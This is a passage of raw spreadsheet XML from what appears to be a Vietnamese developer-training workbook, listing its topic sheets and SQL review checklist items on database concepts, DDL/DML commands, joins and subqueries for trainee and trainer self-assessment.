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SQL_Review Checklist" sheetId="2" r:id="rId1"/>
    <sheet name="Java_Review Checklist" sheetId="3" r:id="rId2"/>
    <sheet name="angular" sheetId="4" r:id="rId3"/>
    <sheet name="c#" sheetId="12" r:id="rId4"/>
    <sheet name="java spring" sheetId="5" r:id="rId5"/>
    <sheet name="SQL" sheetId="6" r:id="rId6"/>
    <sheet name="Git" sheetId="11" r:id="rId7"/>
    <sheet name="Java core" sheetId="7" r:id="rId8"/>
    <sheet name="fe-js" sheetId="13" r:id="rId9"/>
    <sheet name="ôn tập thêm" sheetId="15" r:id="rId10"/>
    <sheet name="reactjs" sheetId="14" r:id="rId11"/>
    <sheet name="Sheet1" sheetId="8" r:id="rId12"/>
    <sheet name="ctdl &amp; gt" sheetId="9" r:id="rId13"/>
    <sheet name="Oop" sheetId="10" r:id="rId14"/>
    <sheet name="fetch-form-route" sheetId="16" r:id="rId15"/>
    <sheet name="nền tảng fe" sheetId="17" r:id="rId16"/>
    <sheet name="html &amp; css" sheetId="18" r:id="rId17"/>
    <sheet name="fe-ts" sheetId="19" r:id="rId18"/>
    <sheet name="web-platform" sheetId="20" r:id="rId19"/>
    <sheet name="http&amp;net&amp;api" sheetId="21" r:id="rId20"/>
    <sheet name="react-per-pat-test" sheetId="22" r:id="rId21"/>
    <sheet name="state global" sheetId="23" r:id="rId22"/>
    <sheet name="nextjs" sheetId="24" r:id="rId23"/>
    <sheet name="cicd-sercuity-per-architure" sheetId="25" r:id="rId24"/>
    <sheet name="dễ gặppvan" sheetId="26" r:id="rId25"/>
    <sheet name="tanstacjk" sheetId="27" r:id="rId26"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId27"/>
    <externalReference r:id="rId28"/>
    <externalReference r:id="rId29"/>
    <externalReference r:id="rId30"/>
    <externalReference r:id="rId31"/>
  </externalReferences>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'SQL_Review Checklist'!$B$3:$M$148</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'Java_Review Checklist'!$C$3:$M$160</definedName>
    <definedName name="__PA3" localSheetId="1" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="__PA3" localSheetId="0" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="__PA3" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="_a1" localSheetId="1" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="_a1" localSheetId="0" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="_a1" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="_Fill" localSheetId="0" hidden="1">#REF!</definedName>
    <definedName name="_Fill" hidden="1">#REF!</definedName>
    <definedName name="_xlnm._FilterDatabase" hidden="1">#REF!</definedName>
    <definedName name="_FilterDatabase1" localSheetId="0" hidden="1">#REF!</definedName>
    <definedName name="_FilterDatabase1"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PA3" localSheetId="1" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="_PA3" localSheetId="0" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="_PA3" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="_Sort" localSheetId="0" hidden="1">#REF!</definedName>
    <definedName name="_Sort" hidden="1">#REF!</definedName>
    <definedName name="_SU15" localSheetId="1" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="_SU15" localSheetId="0" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="_SU15" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="ACTION" localSheetId="0">#REF!</definedName>
    <definedName name="ACTION">#REF!</definedName>
    <definedName name="AS2DocOpenMode" hidden="1">"AS2DocumentEdit"</definedName>
    <definedName name="CourseParam" localSheetId="0">#REF!</definedName>
    <definedName name="CourseParam">#REF!</definedName>
    <definedName name="CTCT1" localSheetId="1" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="CTCT1" localSheetId="0" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="CTCT1" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="GioGiacHT" localSheetId="0">#REF!</definedName>
    <definedName name="GioGiacHT">#REF!</definedName>
    <definedName name="h" localSheetId="1" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="h" localSheetId="0" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="h" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="HTML_CodePage" hidden="1">950</definedName>
    <definedName name="HTML_Control" localSheetId="1" hidden="1">{"'Sheet1'!$L$16"}</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1" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="huy" localSheetId="0" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="huy" hidden="1">{"'Sheet1'!$L$16"}</definedName>
    <definedName name="Importance" localSheetId="0">#REF!</definedName>
    <definedName name="Importance">#REF!</definedName>
    <definedName name="Important" localSheetId="0">#REF!</definedName>
    <definedName name="Important">#REF!</definedName>
    <definedName name="ImportantList" localSheetId="0">#REF!</definedName>
    <definedName name="ImportantList">#REF!</definedName>
    <definedName name="Member" localSheetId="0">#REF!</definedName>
    <definedName name="Member">#REF!</definedName>
    <definedName name="Muc_DG">'[1]Trainee Evaluation Guides'!$B$10:$B$14</definedName>
    <definedName name="MucDG" localSheetId="0">#REF!</definedName>
    <definedName name="MucDG">#REF!</definedName>
    <definedName name="NhomTC" localSheetId="0">#REF!</definedName>
    <definedName name="NhomTC">#REF!</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="0">#REF!</definedName>
    <definedName name="_xlnm.Print_Area">#REF!</definedName>
    <definedName name="Ref.Admission">[2]Reference!$AJ$3:$AJ$5</definedName>
    <definedName name="Ref.ClassCode" localSheetId="0">[2]Reference!#REF!</definedName>
    <definedName name="Ref.ClassCode">[2]Reference!#REF!</definedName>
    <definedName name="Ref.Delivery">[2]Reference!$S$3:$S$10</definedName>
    <definedName name="Ref.Format">[2]Reference!$P$3:$P$5</definedName>
    <definedName name="Ref.IT">[2]Reference!$M$6:$M$24</definedName>
    <definedName name="Ref.Lang">[2]Reference!$M$3:$M$5</definedName>
    <definedName name="Ref.NoSubsubject">[2]Reference!$M$21</definedName>
    <definedName name="Ref.ProjectCode">[2]Reference!$AN$3:$AN$45</definedName>
    <definedName name="Ref.RegType">[2]Reference!$AL$3:$AL$5</definedName>
    <definedName name="Ref.Scope">[2]Reference!$G$3:$G$5</definedName>
    <definedName name="Ref.Subject">[2]Reference!$J$3:$J$10</definedName>
    <definedName name="Ref.Trainer">[2]Reference!$AB$3:$AB$5</definedName>
    <definedName name="Ref.TrainingContribution">[2]Reference!$AE$3:$AE$8</definedName>
    <definedName name="sfs">'[3]CP-Guides'!$B$10:$B$14</definedName>
    <definedName name="ThoiLuongHT" localSheetId="0">#REF!</definedName>
    <definedName name="ThoiLuongHT">#REF!</definedName>
    <definedName name="TraineeParam">[4]Diary!$A$28:$A$33</definedName>
    <definedName name="type1">'[5]Schedule + Budget'!$S$3:$S$6</definedName>
    <definedName name="v" localSheetId="0">#REF!</definedName>
    <definedName name="v">#REF!</definedName>
    <definedName name="wrn.chi._.tiÆt." localSheetId="1" hidden="1">{#N/A,#N/A,FALSE,"Chi tiÆt"}</definedName>
    <definedName name="wrn.chi._.tiÆt." localSheetId="0" hidden="1">{#N/A,#N/A,FALSE,"Chi tiÆt"}</definedName>
    <definedName name="wrn.chi._.tiÆt." hidden="1">{#N/A,#N/A,FALSE,"Chi tiÆt"}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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="3016" uniqueCount="2163">
  <si>
    <t>&lt;&lt;SQL Review Checklist&gt;&gt;</t>
  </si>
  <si>
    <t>NO.</t>
  </si>
  <si>
    <t>Objective</t>
  </si>
  <si>
    <t>Topic</t>
  </si>
  <si>
    <t>Type</t>
  </si>
  <si>
    <t>Question</t>
  </si>
  <si>
    <t>Link ref (for Practice)</t>
  </si>
  <si>
    <t>Trainee Assess_ment</t>
  </si>
  <si>
    <t>Trainer Assessment</t>
  </si>
  <si>
    <t>Note</t>
  </si>
  <si>
    <t>Priority</t>
  </si>
  <si>
    <t>Severity</t>
  </si>
  <si>
    <t>P</t>
  </si>
  <si>
    <t>Audit</t>
  </si>
  <si>
    <t>SI001</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ Relational Database Concepts 
+ Shema
+ What is RDBMS?
+ ER Model
+ Basic E-R Notation
+ Cardinality of Relationships 
+ Converting ER Model to relational schema </t>
    </r>
  </si>
  <si>
    <t>DB Concepts and ER Model</t>
  </si>
  <si>
    <t>Theory</t>
  </si>
  <si>
    <t>Đã hiểu khái niệm Cơ sở dữ liệu quan hệ chưa?</t>
  </si>
  <si>
    <t>SI002</t>
  </si>
  <si>
    <t>Hiểu khái niệm Entity relationship?</t>
  </si>
  <si>
    <t>Mandatory</t>
  </si>
  <si>
    <t>SI003</t>
  </si>
  <si>
    <t>Practice</t>
  </si>
  <si>
    <t>Đã thực hành tạo ERD?</t>
  </si>
  <si>
    <t>SI004</t>
  </si>
  <si>
    <t>Có bao nhiêu loại Relationship?</t>
  </si>
  <si>
    <t>SI005</t>
  </si>
  <si>
    <t>Hiểu khái niệm Relational Database schema?</t>
  </si>
  <si>
    <t>SI006</t>
  </si>
  <si>
    <t>Nắm được 'rule' chuyển đổi từ ERD sang Relational Database schema?</t>
  </si>
  <si>
    <t>SI007</t>
  </si>
  <si>
    <t>Đã thực hành chuyển đổi từ ERD sang Relational DB Schema?</t>
  </si>
  <si>
    <t>SI008</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>-Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ Can categorize the main database objects
+ Create a simple table
+ Understand how constraints are created at the time of table creation
+ Describe how schema objects work
+ Understand and use to commands create, alter, drop, truncate table</t>
    </r>
  </si>
  <si>
    <t>DB Basic</t>
  </si>
  <si>
    <t>Nắm được về các kiểu dữ liệu trong SQL Server?</t>
  </si>
  <si>
    <t>SI009</t>
  </si>
  <si>
    <t>Đã hiểu khái niệm DLL (Data Definition Language)?</t>
  </si>
  <si>
    <t>SI010</t>
  </si>
  <si>
    <t>Đã hiểu câu lệnh create, alter, drop?</t>
  </si>
  <si>
    <t>SI011</t>
  </si>
  <si>
    <t>Đã thực hành với câu lệnh create, alter, drop?</t>
  </si>
  <si>
    <t>SI012</t>
  </si>
  <si>
    <t>Hiểu khái niện schema ?</t>
  </si>
  <si>
    <t>SI013</t>
  </si>
  <si>
    <t>Thực hành tạo schema và tạo table với schema đó?</t>
  </si>
  <si>
    <t>SI014</t>
  </si>
  <si>
    <t>Hiểu khái niệm table, cách tạo ra 1 table?</t>
  </si>
  <si>
    <t>SI015</t>
  </si>
  <si>
    <t>Foreign key và Primary key  là gì?</t>
  </si>
  <si>
    <t>SI016</t>
  </si>
  <si>
    <t>Thực hành tạo Foreign key và primary key?</t>
  </si>
  <si>
    <t>SI017</t>
  </si>
  <si>
    <t>Thực hành tạo table?</t>
  </si>
  <si>
    <t>SI018</t>
  </si>
  <si>
    <t>Nắm được các kiểu ràng buộc (constraints) trên table?</t>
  </si>
  <si>
    <t>SI019</t>
  </si>
  <si>
    <t>Đã thực hành với các ràng buộc NOT NULL, CHECK UNIQUE?</t>
  </si>
  <si>
    <t>SI020</t>
  </si>
  <si>
    <t>Đã thực hành với PRIMARY KEY, DEFAULT, FOREIGN KEY?</t>
  </si>
  <si>
    <t>SI021</t>
  </si>
  <si>
    <t>Hiểu Constraints Scope (table level and column level)?</t>
  </si>
  <si>
    <t>SI022</t>
  </si>
  <si>
    <t>Đã hiểu về từ khóa IDENTITY?</t>
  </si>
  <si>
    <t>SI023</t>
  </si>
  <si>
    <t>Đã thực hành tạo table với bảng sử dụng IDENTITY?</t>
  </si>
  <si>
    <t>SI024</t>
  </si>
  <si>
    <t>Hiểu về từ khóa TRUNCATE?</t>
  </si>
  <si>
    <t>SI025</t>
  </si>
  <si>
    <t>Thực hành với từ khóa TRUNCATE?</t>
  </si>
  <si>
    <t>SI026</t>
  </si>
  <si>
    <t>Hiểu khái niệm Index trong SQL?</t>
  </si>
  <si>
    <t>SI027</t>
  </si>
  <si>
    <t>Nắm được mục đích phải dùng index?</t>
  </si>
  <si>
    <t>SI028</t>
  </si>
  <si>
    <t>Biết cách tạo ra index trên table?</t>
  </si>
  <si>
    <t>SI029</t>
  </si>
  <si>
    <t>Phân loại index, điểm khác nhau giữa các loại đó?</t>
  </si>
  <si>
    <t>SI030</t>
  </si>
  <si>
    <t>Đã thực hành sử dụng index?</t>
  </si>
  <si>
    <t>SI031</t>
  </si>
  <si>
    <t>Hiểu khái niệm về View?</t>
  </si>
  <si>
    <t>SI032</t>
  </si>
  <si>
    <t>Tại sao phải sử dụng view?</t>
  </si>
  <si>
    <t>SI033</t>
  </si>
  <si>
    <t>Thực hành tạo/sử dụng và xóa view?</t>
  </si>
  <si>
    <t>SI034</t>
  </si>
  <si>
    <t>Nắm được các quy tắc đặt tên (Naming Convention) và quy tắc viết code (Coding Style) trong SQL?</t>
  </si>
  <si>
    <t>SI035</t>
  </si>
  <si>
    <t>Áp dụng quy tắc đặt tên (Naming Convention) và quy tắc viết code (Coding Style) vào trong thực hành?</t>
  </si>
  <si>
    <t>SI036</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>-Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ Understanding Data Manipulation Language (DML) statements
+ Insert rows into a table
+ Update rows in a table
+ Delete rows in a table</t>
    </r>
  </si>
  <si>
    <t>SQL Basic</t>
  </si>
  <si>
    <t>Hiểu khái niệm DML (Data Manipulation Language)?</t>
  </si>
  <si>
    <t>SI037</t>
  </si>
  <si>
    <t>Hiểu câu lện INSERT?</t>
  </si>
  <si>
    <t>SI038</t>
  </si>
  <si>
    <t>Đã thực hành chèn dữ liệu vào bảng sử dụng câu lệnh INSERT?</t>
  </si>
  <si>
    <t>SI039</t>
  </si>
  <si>
    <t>Hiểu câu lệnh UPDATE?</t>
  </si>
  <si>
    <t>SI040</t>
  </si>
  <si>
    <t>Thực hành chỉnh sửa dữ liệu sử dụng câu lệnh UPDATE?</t>
  </si>
  <si>
    <t>SI041</t>
  </si>
  <si>
    <t>Hiểu câu lệnh DELETE?</t>
  </si>
  <si>
    <t>SI042</t>
  </si>
  <si>
    <t>Thực hành xóa với câu lệnh DELETE?</t>
  </si>
  <si>
    <t>SI043</t>
  </si>
  <si>
    <t>So sánh DELETE , TRUNCATE và DROP?</t>
  </si>
  <si>
    <t>SI044</t>
  </si>
  <si>
    <t>Hiểu tác dụng và các thành phần trong câu lệnh SELECT?</t>
  </si>
  <si>
    <t>SI045</t>
  </si>
  <si>
    <t>Thực hành truy vấn dữ liệu sử dụng lệnh SELECT?</t>
  </si>
  <si>
    <t>SI046</t>
  </si>
  <si>
    <t>Hiểu syntax ALIAS (từ khóa AS)?</t>
  </si>
  <si>
    <t>SI047</t>
  </si>
  <si>
    <t>Thực hành với ALIAS?</t>
  </si>
  <si>
    <t>SI048</t>
  </si>
  <si>
    <t>Hiểu về câu lệnh GROUP BY?</t>
  </si>
  <si>
    <t>SI049</t>
  </si>
  <si>
    <t>Đã thực hành câu lệnh GROUP BY?</t>
  </si>
  <si>
    <t>SI050</t>
  </si>
  <si>
    <t>Hiểu mục đích của HAVING trong câu truy vấn?</t>
  </si>
  <si>
    <t>SI051</t>
  </si>
  <si>
    <t>Đã thực hành với câu lệnh HAVING?</t>
  </si>
  <si>
    <t>SI052</t>
  </si>
  <si>
    <t>So sánh được HAVING and WHERE?</t>
  </si>
  <si>
    <t>SI053</t>
  </si>
  <si>
    <t>Hiểu từ khóa ORDER BY?</t>
  </si>
  <si>
    <t>SI054</t>
  </si>
  <si>
    <t>Đã thực hành với từ khóa ORDER BY?</t>
  </si>
  <si>
    <t>SI055</t>
  </si>
  <si>
    <t>Có thể sử dụng được 1 số hàm 'Conversion Functions' cơ bản?</t>
  </si>
  <si>
    <t>SI056</t>
  </si>
  <si>
    <t>Có thể sử dụng 1 số hàm 'Date and Time Functions' cơ bản (DATEDIFF, DATEADD, DATEPART, ...)</t>
  </si>
  <si>
    <t>SI057</t>
  </si>
  <si>
    <t>Hiểu về những hàm Aggregate là gì ?</t>
  </si>
  <si>
    <t>SI058</t>
  </si>
  <si>
    <t>Thực hành sử dụng các hàm Aggregate?</t>
  </si>
  <si>
    <t>SI059</t>
  </si>
  <si>
    <t>Hiểu toán tử UNION và UNION ALL?</t>
  </si>
  <si>
    <t>SI060</t>
  </si>
  <si>
    <t>Thực hành sử dụng UNION và UNION ALL?</t>
  </si>
  <si>
    <t>SI061</t>
  </si>
  <si>
    <t>Hiểu lệnh SELECT INTO?</t>
  </si>
  <si>
    <t>SI062</t>
  </si>
  <si>
    <t>Thực hành sử dụng lệnh SELECT INTO?</t>
  </si>
  <si>
    <t>SI063</t>
  </si>
  <si>
    <t>Hiểu lệnh INSERT INTO SELECT?</t>
  </si>
  <si>
    <t>SI064</t>
  </si>
  <si>
    <t>Thực hành sử dụng lệnh INSERT INTO SELECT?</t>
  </si>
  <si>
    <t>SI065</t>
  </si>
  <si>
    <t>Hiểu chức năng và cách sử dụng của hàm CAST?</t>
  </si>
  <si>
    <t>SI066</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ Understand the built-in functions in SQL Server
+ Understand how to use built-in functions to perform operations on data
+ Conversion Functions
+ Date and Time Functions
+ String Functions</t>
    </r>
  </si>
  <si>
    <t>Built-in functions</t>
  </si>
  <si>
    <t>Thực hành sử dụng CAST function</t>
  </si>
  <si>
    <t>SI067</t>
  </si>
  <si>
    <t>Hiểu chức năng và cách sử dụng của Convert Function</t>
  </si>
  <si>
    <t>SI068</t>
  </si>
  <si>
    <t>Thực hành sử dụng convert function</t>
  </si>
  <si>
    <t>SI069</t>
  </si>
  <si>
    <t>Hiểu chức năng và cách sử dụng date and time functions</t>
  </si>
  <si>
    <t>SI070</t>
  </si>
  <si>
    <t>Chức năng và cách sử dụng của GETDATE() và DATEPART()</t>
  </si>
  <si>
    <t>SI071</t>
  </si>
  <si>
    <t>Thực hành sử dụng casc hàm GETDATE(), DATEPART</t>
  </si>
  <si>
    <t>SI072</t>
  </si>
  <si>
    <t>Hiểu chức năng và cách sử dụng các hàm DAY, MONTH, YEAR</t>
  </si>
  <si>
    <t>SI073</t>
  </si>
  <si>
    <t>Thực hành sử dụng hàm DAY, MONTH, YEAR</t>
  </si>
  <si>
    <t>SI074</t>
  </si>
  <si>
    <t>Hiểu chức năng và cách sử dụng DATEADD, DATEIFF function</t>
  </si>
  <si>
    <t>SI075</t>
  </si>
  <si>
    <t>Thực hành sử dụng hàm DATEADD &amp; DATEIFF</t>
  </si>
  <si>
    <t>SI076</t>
  </si>
  <si>
    <t>Hiểu các String function</t>
  </si>
  <si>
    <t>SI077</t>
  </si>
  <si>
    <t>Hiểu chức năng và cách sử dụng RTRIM, LTRIM Function</t>
  </si>
  <si>
    <t>SI078</t>
  </si>
  <si>
    <t>Thực hành chuẩn hóa String với RTRIM và LTRIM</t>
  </si>
  <si>
    <t>SI079</t>
  </si>
  <si>
    <t>Hiểu chức năng và cách sử dụng hàm SUBSTRING</t>
  </si>
  <si>
    <t>SI080</t>
  </si>
  <si>
    <t>Thực hành với hàm SUBSTRING</t>
  </si>
  <si>
    <t>SI081</t>
  </si>
  <si>
    <t>Hiểu chức năng và cách sử dụng hàm LEN, CHARINDEX, PATINDEX</t>
  </si>
  <si>
    <t>SI082</t>
  </si>
  <si>
    <t>Thực hành với các hàm LEN, CHARINDEX, PATINDEX</t>
  </si>
  <si>
    <t>SI083</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>- Hiểu và thực hành</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
+ Understand about SQL joins, subqueries, common table expressions and ranking functions in SQL Server
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Advanced DML </t>
  </si>
  <si>
    <t>Đã hiểu về SQL Join? Có thể phân loại Join trong SQL?</t>
  </si>
  <si>
    <t>SI084</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>Hiểu về</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> INNER JOIN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>SI085</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành sử dụng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>INNER JOIN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>SI086</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Các loại </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>OUTER JOIN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> ?</t>
    </r>
  </si>
  <si>
    <t>SI087</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Đã hiểu đặc điểm của </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>LEFT JOIN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>SI088</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành sử dụng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>LEFT JOIN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>SI089</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>Đã hiểu đặc điểm của</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> RIGHT JOIN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>SI090</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành sử dụng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>RIGHT JOIN?</t>
    </r>
  </si>
  <si>
    <t>SI091</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Đã hiểu đặc điểm của </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>FULL JOIN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>SI092</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Thực hành sử dụng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>FULL JOIN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>SI093</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Hiểu tác dụng và syntax của </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>CROSS JOIN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>SI094</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Đã thực hành với </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>CROSS JOIN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>SI095</t>
  </si>
  <si>
    <t>Đã hiểu khái niệm self join?</t>
  </si>
  <si>
    <t>SI096</t>
  </si>
  <si>
    <t>Đã thực hành với self join?</t>
  </si>
  <si>
    <t>SI097</t>
  </si>
  <si>
    <t>Có thể thực hành với các loại join trên 3 bảng trở lên?</t>
  </si>
  <si>
    <t>SI098</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Đã hiểu về </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>Sub-queries</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>?</t>
    </r>
  </si>
  <si>
    <t>SI099</t>
  </si>
  <si>
    <t>Khi nào/lợi ích của việc sử dụng Sub-queries?</t>
  </si>
  <si>
    <t>SI100</t>
  </si>
  <si>
    <t>Có thể phân loại Sub-queries?</t>
  </si>
  <si>
    <t>SI101</t>
  </si>
  <si>
    <t>Có thể thực hành truy vấn với Sub-queries?</t>
  </si>
  <si>
    <t>SI102</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Nắm được khái niệm </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Candara"/>
        <charset val="134"/>
      </rPr>
      <t>Common Table Expressions (CTE)</t>
    </r>
    <r>
      <rPr>
